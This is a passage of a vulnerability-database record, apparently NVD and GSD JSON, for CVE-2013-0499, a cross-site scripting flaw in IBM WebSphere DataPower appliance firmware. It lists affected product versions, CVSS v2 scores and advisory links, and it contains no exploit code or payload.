              "criteria": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "52EF1C54-93CD-4B24-B553-0959A3816849",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "91AC9EFB-90F4-4608-9C36-CDE03234CE34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE42F365-E83B-4DA8-B84A-E81F77CC63B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D25888C5-0200-4124-AE4F-D1989B9D0943",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AB499F52-5A18-40F9-A63A-A7C0E2A79D2D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "50016031-DAFB-420A-BC46-66C8D89681F4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8DC137A-40F9-4E81-AE46-D1A512533FD1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E83E70F-AB49-43F7-A873-A1C6B5429E1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68324EA4-89EA-4752-B39D-DA13B7FC39A8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "85315EC4-FCAF-44CC-8BF9-C85CAD3637BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF697743-6F1C-4C98-9EA2-E1EE1E7963CB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "0434DBE4-7EE5-4A9D-AB44-02DC114BBD55",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BEC2F83-9C7F-44D9-A75B-BC5CDBCD61D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2C1AE21E-2D17-44F9-A116-4A162DEA8F60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11817A12-ED84-4EF4-97CF-F8EB95F7196A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F0B9D60E-8218-4A58-9DD3-CF4D8AEF7914",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7D77730-2F0E-4046-942F-ACDCF4C16439",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C6AC122-7C0B-42B3-B9FB-1E1F4E3C31FF",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F9EBDAA7-4D20-4328-A4D7-19C5493A9EDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5586C7C0-315B-4F3E-921B-30260A5A6238",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5ED9C5A0-274C-4CAF-84E2-3A59B48C890C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "126DDB17-7D0A-426C-9CC2-EFED785E8CDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "ED6E2091-AEC2-43FD-A5D3-B6F805C95CD7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8E7E192-0494-498C-BF20-7C2AF3102D0B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2346457F-39BA-407E-8451-D44FB947757E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A592E7D9-B5B8-45DD-AAF0-E380F7511AA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A570957F-5B26-46FD-B51B-E90C96EB4168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "04EFE5AD-4652-4254-8AE9-D06F3453A808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AD176549-564F-49E8-9FDA-F4C263E5817F",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "137D5F48-9118-4C2D-941A-8AEB48567443",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "AB95DC9D-D74B-45E1-AFB0-80F7A1F46FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0833251B-E8A5-4E4A-B7CC-700E205509FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD789CDF-5F99-4FD3-ADE2-36297310EADA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF02EAA9-1CDA-4C8C-AF34-E133AA3497D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E6B0888-C558-48EF-9C1B-4E169ECC70AD",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EBB66F8-B497-404C-813A-A40E853054D6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "357A5629-DF00-483B-BD8F-CCD05CF8CFA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "122283E7-E514-4ED7-9529-A75CF236855B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "716DBA1D-16EE-4E87-BA6B-A444981392BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "513606F6-9E5C-45E9-86AE-332F1EDC06D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "390A7634-FDD9-4FB9-8641-31AB41168E85",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "5257F9FA-F807-4D15-BF7C-8A9531619A50",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de tipo cross-site scripting (XSS) en la funcionalidad echo en dispositivos SOA WebSphere DataPower de IBM con la versi\u00f3n de firmware 3.8.2, 4.0, 4.0.1, 4.0.2 y 5.0.0, permite a los atacantes remotos inyectar script web o HTML arbitrarios por medio de un mensaje SOAP, como es demostrado por los servicios Firewall XML, Multi Protocol Gateway (MPGW), Proxy de servicio web y Token web."
    }
  ],
  "id": "CVE-2013-0499",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ]
  },
  "published": "2013-05-28T16:55:01.133",
  "references": [
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/bugtraq/2013/May/83"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
    },
    {
      "source": "psirt@us.ibm.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
    },
    {
      "source": "psirt@us.ibm.com",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/bugtraq/2013/May/83"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
    }
  ],
  "sourceIdentifier": "psirt@us.ibm.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2013-0499

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2013-0499

Aliases

CVE-2013-0499

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2013-0499",
    "description": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.",
    "id": "GSD-2013-0499"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2013-0499"
      ],
      "details": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services.",
      "id": "GSD-2013-0499",
      "modified": "2023-12-13T01:22:14.882545Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@us.ibm.com",
        "ID": "CVE-2013-0499",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt",
            "refsource": "MISC",
            "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
          },
          {
            "name": "was-datapower-echo-xss(82221)",
            "refsource": "XF",
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
          },
          {
            "name": "20130523 SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services",
            "refsource": "BUGTRAQ",
            "url": "http://seclists.org/bugtraq/2013/May/83"
          },
          {
            "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717",
            "refsource": "CONFIRM",
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@us.ibm.com",
          "ID": "CVE-2013-0499"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-79"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20130523 SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services",
              "refsource": "BUGTRAQ",
              "tags": [
                "Exploit"
              ],
              "url": "http://seclists.org/bugtraq/2013/May/83"
            },
            {
              "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717",
              "refsource": "CONFIRM",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
            },
            {
              "name": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
